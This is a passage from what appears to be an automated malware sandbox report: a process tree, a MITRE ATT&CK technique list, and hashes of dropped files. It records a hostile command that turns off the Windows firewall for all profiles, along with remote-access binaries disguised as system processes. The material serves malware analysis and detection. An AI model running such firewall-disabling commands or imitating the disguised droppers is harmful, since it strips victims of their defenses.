- - C:\Windows\SYSTEM32\NetSh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:1492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1948

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultae822e57hc4edh452bha9dbh7fe60a99189c
1⤵
PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd091946f8,0x7ffd09194708,0x7ffd09194718
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,7549023215060348808,18148007086819385773,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
  2⤵
  PID:5352

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5100
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  PID:1924
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:4584
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4120

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5784

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:5808

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4752

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:2772

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fd0055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a774512b00820b61a51258335097b2c9

SHA1
38c28d1ea3907a1af6c0443255ab610dd9285095

SHA256
01946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4

SHA512
ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fd7944a4ff1be37517983ffaf5700b11

SHA1
c4287796d78e00969af85b7e16a2d04230961240

SHA256
b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74

SHA512
28c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
31689b29a38245296e3c9c3c7bad6f34

SHA1
0c4defde522791a86c08d5224ecfff13b27b792a

SHA256
5933f149d6207c98c52fc7535d2b9b8cb5196fc6bf10f5465d7df0d4aadfa304

SHA512
9d8125b16e522672d28de638e72ac50ff992cbdd086ff9e3efd7dc836181a919fba5ee0791326f24734c71fa6c5f0fffeeb64899e4431b0a37025087806ab8da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
abc288be24c27c9543dfd65781a1ab1d

SHA1
5684b4d0af2599bb3d34d35a26c70631ad5fe9dc

SHA256
dbb299d582696d638bb9536051b8f71dc44e877ce8963280fda72361d4e940df

SHA512
c8aaf75ecfdb5da6d24fa39685b7d978bb18748b244c061a7f7968a0f48fd34b067df77224b4710c3b1986bba456dca87ea4305d06d37118d76f9d66470fb62f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
d74a35f654b40a9f46db99a935a2ea85

SHA1
e6d362d4416955b1ad287049dae5d868f9326a4a

SHA256
6b63d9329e659af47a065c64bd1bfa1a8a9664eccfbb53cd3a95c52419f4be8b

SHA512
6f380efb965fcf82b4b8ffd831982555e435dd9e91ce0903ee176d6977a471ca6fd97e408d84c56fb701bb4649260c17faf9b95f155a04d9f25d831ade31e42c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
144d8c915576554c50a329cecd7e007e

SHA1
ed2fa55f1e946c1f542dc679e5e8dcacfeaadefa

SHA256
aedd2548dc08d9ec5207d66c07c584f36584202bce827d1a2fd2093c55b84703

SHA512
b7476d3a8f6e5819738f2ecc011f4abd29abf9740ac24cfc60471688c32bf6d26b69532d5af2c4973e7c094348ab8686feaace050804dac76403ffe504653411

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
70b1aaaf7d2906c9cc6662d68d479832

SHA1
58d05b49d349122f0bdfbf6f2520ca59e67c5606

SHA256
768afd7871004c2a5d4b9f6f3565d6d670eeb64dc46eda40bf3ab4106e9f4eeb

SHA512
848f21981cabb04fe7ad5ce6ef9f18e4b5f99b2e690d78f0c644195c90b2c3dfeece6906275d0857f77c832b31f6155425cf7067df10a6ed0e6ac8b31d52ec8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
3b060931e1096965d292f7e17ff73359

SHA1
972effe99bc98630ee24b778690b83af639a9b5d

SHA256
3b744006ebd0a9968d42437a43528e5a09a3783a3e68ff075a44fcd457468be1

SHA512
8cbfbeffae13e99f8fff72648cf946eb9c954ec69bdd123a1243a083a5e0e195f03fb48d11e0c40e6d56bf30f6c4197bdc4399e945fe6115e56e6b1048b479ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
481B

MD5
7caaf0084617d2cdab0fbfa20332fb77

SHA1
6016e6befffcd77f6d19d1585d0db23e93331c1b

SHA256
135e2c56913e2248883de38c1ce621ca9214c930cbf9f6338a8c35c6806f7f74

SHA512
7afcb999e75711cb221f45a43202dcd361c3597f067e6f4b6e28eb9ecec9876f0c035c57285706162ff7a50e283e2bc11d8813e33ac7987efe8fa5e32ec21ce5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
1bb492f3180d89f87018c2f0f943c96d

SHA1
8899dd093a0b82b8545c75b9abcdb406d5c03140

SHA256
d47ecefed6b18f4a8fa976df3b8932d9175a7e847359a22c3aab39b35a88f1bd

SHA512
dbb9436dc01c2a8956ee2ad1892170e420b194991e44bd07aa0840560b45292d84fac768bde2295fb9298a88057a726dc5d913e1a4a89d8472a77e8c79c5da2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bbe63e984df1a24d32c72e1455fc82f7

SHA1
9171d6ba7e8f6385d8a7954b25853cdd91e3673d

SHA256
1b476197f1f841052a44c479282b09cd99471d852cd609c0a07f063627bcb2c4

SHA512
a3283358d953b308db2fc83e57044eff64eddf47016d9a38710ff375b0a868796fa1949222d2de4c883264e3b8cb70fcac3d9f56681600b3b7e9d2039c1c3134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0849c843c40096addbff6ff3ad561e6e

SHA1
53ccb5e59175c9a75b2d08a713dd8cb4b40fda41

SHA256
bf4fbe3174ffdd6b98f4dacc5696836ed12026096f09500b6b587c43adb114fa

SHA512
1625007dc352835a58a8ae83cc28c8412527f4cc46a92ae33517f4ead438e8bf9b743e9227f13d9682e4dd45e0cf2ae41dd49cdd697efaa9c26de4f1b4f2df9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
94fabe1cc276bae31eb464d575ce7764

SHA1
1dc568998655c0e353435034bfcbd02e8b6154eb

SHA256
776472d4d168c9795c34abcffc059744be464276e919d7ede44d62f5789afdad

SHA512
88eacd8e65342c79bb96da252c7485663a080fbfe050b8f4ceb46124d8fa844e0fa766602412bdd81c654e368d4942f41863ac2e417bd2df44c8b4ebee74c878

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
77affd3bc1c11cc46d6479701a36e1e6

SHA1
876db4693889884470b79a3b42d849de2a7a8da1

SHA256
526fe2a996f3b8f149c21454421231e8b3f900b09ee62723b6ba3b12b3c0fa89

SHA512
69248cc208c2b32a68e7798ce462f1ff068e4e6f78f41ad0029c4dc5462e3a6239ad27c952f6fb2a3b46968c0bc874a00cf1f54e12a6ab26ced791bbe409adad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
98131612abf7f19e965992b8d0e56884

SHA1
3876832d92a0e7b36540e5b61882298ba090a330

SHA256
0e1771a220e69b2fe3ce0aa1a9c0a5d660f06acac1e5ffe82be00dc59fe572dd

SHA512
bd621766b9c5d74f188fbbf5d4f70d05af2b9a0c76f547538b2c003394357f5f90d57948eaf2d020ea3dc56c6ebb2ed69408dee5ba16a6256f1b978275c77405

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
30f7266f108a43beca272161f4e497c2

SHA1
03b2fc2add421ea5a1299d4f208fdcfb6c7ba499

SHA256
b6d6c533bd48076ea54fec7894b8eb7c4541a05ea4c4b67a6d1e8ec37e2c267c

SHA512
6d4e376e533e3a1bccd4f079c3594827bd45a6c2731ba2e7f776c1faf9d60bd0f5861cddee3f9045190e3e6e52057a86b64dbffde3f6989451af6f4f77eee815

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
47e9ee306f0387e273eaa88c89ef175d

SHA1
f0a1525bb55f8e59ba0af0b9330a0cbcfcd22d94

SHA256
0ca48de79617b6bd4f33557617cf4c828d2379db891cee89148b216b8d5e8b35

SHA512
297c8b543277d439bf824eec080a1e371ef3f0a3b5027db6b7c1511e86bd2ab15a1794bffe62d684e4ed488c412843365fbea86e2a91e3b77caf802ae7f268df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
129d0666703ac902e64b517a6b459c10

SHA1
242e1aced4e401b405efc5ca85a2f2982e6bd490

SHA256
cc170acf4d0df22638bf5055e2862760fd80f12e91ee086d3d6bc75bc3c6e3f7

SHA512
12a32ec594390a7f8196dabe483f39621c091fbd30a69c88507e89464f0a86ed6480c31e7d2b03516ed698e90c65ef0961ca06ce904d286c0e387103bbd21400

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c17195501d382b51591b172cad2145d7

SHA1
74964e336aff5b0fd51c423f0a594b7a390fd3a8

SHA256
2b9cded8bd7f9c43334d4585ef64de8fee21fbb35111867b665ef5dd4620fe79

SHA512
427302cba24811c90cffb8044d2c70ef14af5c46a55848149e419e7c453f9a5a3a076f1b2d0c59a388fdf6651f1034d5f4747243a0da5d32f6e105bc8c2d1ec7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3a29028c065398fae0ba9ef8ad7ded5d

SHA1
4424a50a96664807c178ca0cbfdafd09df0a0e96

SHA256
8b03d952670795c83dfc7281c4b5bc5b3b6773443d3a8c375b54e94d051c5f41

SHA512
200d8c98111d2b3fddef88645e8cb39633f975c386f3c8392046e52d2cfe899edc524b194acf585aed6369e206740e948c7b73856190230dfcc98c975957dc90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d8f13d38161b7f1db85eab12accebb9d

SHA1
4c71c9ac4ecb484ccf1c23507badb8cc690f6291

SHA256
54ff43950343b85877b823f941e78c49ef0972222620cff8214a3461b19fe0d3

SHA512
08621feb74b129e5d8fcbd0a1e8d56e7b31a0b6a6c41e16a94ecea3d6d0d298e14227c48aedf23cb73e630143ccbf4250dead70f6320aff25bb72892975c4628

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2074c334f1079db01c0e366519c03cf8

SHA1
76129a335d44ed5d981533bbc3bbdb016bda539a

SHA256
14192643bd4dc2fe66ed168c8369c63f3ed479f2a5f0da7d7fc57f708d654527

SHA512
6a3c42a32a65ee16b2837f8d3170daa67a93f05b526a9dd9086b9a76fc68792c74b091a02dddc7578fe42baad6dab42d18ea10c85bb36bd705ea0539cbc045b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
fbc1628f0b5ecbce9f20b1b8486077a7

SHA1
8290f6cac68ab27c0a22de4c7423324e5bc16756

SHA256
c9eb99e5ae00936d4200f7df7458525c3b1bacbf559c5662ac52072efd5654c2

SHA512
31baf230ffab374fd49c456b62ccd9075db646cae8a40087185016331eddf0f1c984eb5d22325c98155845678414d987c53afd69ef03cc6224c2043137972a7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e559825fc3f40688c8aadd857198b96b

SHA1
b1dc443954d8ecbb5637ab6a9e8835bb43655629

SHA256
a15270bc1f6e472477fa67ee91ff210a0b71239dafaa66fa007fba667253e757

SHA512
821b87cd49140e949ddb603dda9f5e7cb7d9eaba88cc4a2208f1377f026e31b20f57cd4e26cac38eade70a631e170e19dd9a638daf3f918847259aa509e1cff4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
202ea74d65c874b839ad8569c7c99edf

SHA1
8d3459885b7545d0f500f240f966068c480d8da4

SHA256
d0a5aeb3a56458feeba4ee105890d9c091b39bcd98e3720a6861727bc5b2e5de

SHA512
6c17e8d5a54ba0c9c6e0aa2c6b8f6fcf36e852806c794b88cffe369550135c812c99b35af55e68dfe01bcb518ba17d77545b12b80b5445dd6a282b25fcf02086

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
3544c2f376474be79a28ea68dc23fc1e

SHA1
9f9882640b6f3f8a53e507cafd7580296a811b1c

SHA256
82625d3d8959bca0f8401aaf15e29592a48ae83d0ab33dfec67b90527598bda2

SHA512
271dd86af925cb058b596fd025e8141ade1deefce494a871bc351381b3857f3ad5a172c264549fdb4a587b5ae7c63b506f9df7137ce834bea0c2dbc2fd3b5ff2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
13429df60d131c12f0cd50b08780cfb3

SHA1
57528c11aa408a5751dd4f69cb602159d6dadd4c

SHA256
32a9183113761c9faadeb457b75de28e70fe28cdeac6ae7d035edfb5ea132adb

SHA512
19bb3458f96e80a8b0e398612812646eb9bb3ac8afee29863d513570b38bd28ce5a546ff913dec16c560f67fe18cd9667ddb1758f01936c66220e90dfe10056f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
bf082954560462987efa5343f05e0e5b

SHA1
0a7ef7ec136079b567a93f6ec45440fbf6ef87e0

SHA256
46796befc0e9b53c8c70af38fff8f8e971780dd4784175916bdf5d3b929530d4

SHA512
600ab78a72514cfde7bed929ab2fe103a78668477d339e21e3eaad2548edd7b50002d6a711ce3b17b5cbe9166624965fca9f65a68cbfeaeed78e472577c92f33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
6759a65e299982f9f758fec1f98ccfae

SHA1
af13e611ba04d3f680658fc29fc5466b415f4222

SHA256
125acac10c9d9f217a35d9309293772e75fcbd6d1af951e74dd4b42c936b1a8e

SHA512
db105da6dde80eb0e108a61766476a4b7932c4117b2e0bea288608e72ebb74dcac5db1678f8657f82feba69ed008359d7ffc5bee92438ec257fc8359f526c476

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ba528e5d1b1091a4080ad73563f27197

SHA1
11757e30e510191cebee534665f7f73b30e20eb7

SHA256
4757e057432ad8eb0b343167646fcd932effd8327e75c0e9e4f78c0ed6bc135d

SHA512
8de5586d0fa19bf720e0d4c1ffcc3de1947da7af6b4212d81ef319df5f1dc5b37130d9d8d5629b24e75fc06c177ac15b22edcc752ff5ac14f64fbc511f8ecce5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5a9099.TMP

Filesize
538B

MD5
a2fdfe5a2e4cfef832181c54bc3c1bbe

SHA1
1e9ddb5f0d04ebed2dca510f2c5d7e826bade75f

SHA256
3e2d37671f1a6cca6113dc48be46146fea3e0222111c10f66868032bc6d3e5cf

SHA512
35cd127340435067c1945ddf52f48010f7b2758ea643d47c2d04a2eb0fb363978cae9fd4daf3eb4b80df3b4c89e4134ba377f0bc5c0139843e6238734eb4bd9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
864e5316b728b74e57fcf6e68f01253c

SHA1
4c937573d109b2c3f9b23b99fc1d5ee51804348a

SHA256
0d67716969457e4ee4b19d51bd7a1729e5596cbb9547d6169519f2cad9f96996

SHA512
7539fcbf096c7f050ec8299e8409abd8b5aeaf39ed8ce8505a512aa4972325cd425e5f3cdca994f77786980a4f9d0fd63fecc1096da734df0313a01874710e2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
af017364fba5b15582f0ab01cad1a1b0

SHA1
921349479f5fecdfa3ff57158192709b874796a1

SHA256
8250cb618dabf86d828193645faa5b04eb05e8ccfc08f543e71689715e075fd2

SHA512
3500d9a88cab084fd33619321eee5727260d0f08787d2d4e62d7023aa0a5f15789719919640981944d03e4a3acef919cfe66ec8c0e241075573670427c7a42c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
43a7c1e5d31f5a790d016349bf4a72d8

SHA1
90a913c39cf530114e61a36fe8782f6850d57b9d

SHA256
59ee653ee0e45ba1e0d92aef33988647b0a01c6e5db6c2c6d5eaba31653494bd

SHA512
c7c989e9c4cc42ae971dddd973e4d31ec895849de6877690ddc72aebd8a938c4c27c2c9e63ce064f7f5155da2c1df0a05ed9e39c7b05ec951769068ca682835b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
6bac977576ea30d769a73bb01d1c16af

SHA1
651e4059153649a07c9d3549227d69764e04fe2d

SHA256
8de1f55aac3e0e62886894278c52652cd037120d059954750d2f7515efc59d86

SHA512
49a567fc8d902b1fd21901753b2821fae54de9c541d0a964b501c66585e25a9ec83de383ff8eae3b75e0f6940d1950da3a956077becc8a9c2f856bf8b8777584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
fde18335a165c170035d803bd69d7354

SHA1
0c4f3f20ddd19d4f28172a70595219e465af4b63

SHA256
3adecc4f1c10370f1684fc3ff9e90ce1af6e15dee5fbbb4ffd0f839be701cefe

SHA512
24d34917a24f3e833c918f6aedb867e0a340a1861a475dc5e086d95e1e6c3604b4b3459f179847240b15b0c7c1f6a38be7c4404e74c68f4add523b9a726fab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
0ff6de431eaa6ace96a6312d6bcdf797

SHA1
6c3424312bfe1bf05859627486e3dd42396b5978

SHA256
08a1095be7426afd9bc3966a87cf6eb4ad7d5bbf7f31451a6b71fddd0c0e938d

SHA512
92df2431f095ba0b755f2b488d27399d5d6f805f85325c46d2cfed3736ab3154885e93c483dc173d8ee2029063fde73026e7bc736bdcd28355c9e012a708cc77

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\VCRUNTIME140_1.dll

Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\_asyncio.pyd

Filesize
37KB

MD5
17ceafd455478c6a6a7a0bc57b87853b

SHA1
dbe386af274c4c477c55c27cee91531ab902f300

SHA256
f1553718724acd7c178f778c62bbc8eaea7ebff142c591a3e20f271b03b47029

SHA512
46bfe68de08b540d57ed146ac2ae3a010508cdd09a6bb693cc8d222d56025476f5085e74197cd045440a0e03ee0b3552c0b5da043f292abf48f52317353e3717

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\_bz2.pyd

Filesize
48KB

MD5
ba8871f10f67817358fe84f44b986801

SHA1
d57a3a841415969051826e8dcd077754fd7caea0

SHA256
9d30387ee07585516f8ce479fcd4e052597835d4149568c1d8382a4a3a0ae7e1

SHA512
8e23b032b785f37b920206fa3064c5fa0e28949f23b2e985fae26c9a355a6bc33dcd380925091f627d4d7936f0958e90fa7c022d89c73db8a1ea6ad267a1a341

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\_ctypes.pyd

Filesize
59KB

MD5
e7629e12d646da3be8d60464ad457cef

SHA1
17cf7dacb460183c19198d9bb165af620291bf08

SHA256
eb8affa4e7a4da15c9cda37c68ac8232d885a9d367b28973473949b205384789

SHA512
974ae1607093161a5f33eda9e0a0ade214700d05eb728c8157e7b7589c587cc1cdefe0132d16d31c2941ed4eec4668428564609a0a2ced983c8b13f98a84801b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\_lzma.pyd

Filesize
86KB

MD5
ed348285c1ad1db0effd915c0cb087c3

SHA1
b5b8446d2e079d451c2de793c0f437d23f584f7b

SHA256
fa84770ccf4394d046ed69edaea71957306a25def4986ee6650daf0a2c2d3e43

SHA512
28a4c21bdb0bd697e93b276c184bfc5e317d930c4462e655d9d9ef7487168809ee952e32a856304cdd67a76d6b2286bf94fe9b9de6706c8d36a810aa916ce8e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\api-ms-win-core-console-l1-1-0.dll

Filesize
21KB

MD5
40ba4a99bf4911a3bca41f5e3412291f

SHA1
c9a0e81eb698a419169d462bcd04d96eaa21d278

SHA256
af0e561bb3b2a13aa5ca9dfc9bc53c852bad85075261af6ef6825e19e71483a6

SHA512
f11b98ff588c2e8a88fdd61d267aa46dc5240d8e6e2bfeea174231eda3affc90b991ff9aae80f7cea412afc54092de5857159569496d47026f8833757c455c23

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI37762\api-ms-win-core-datetime-l1-1-0.dll

Filesize
21KB

MD5
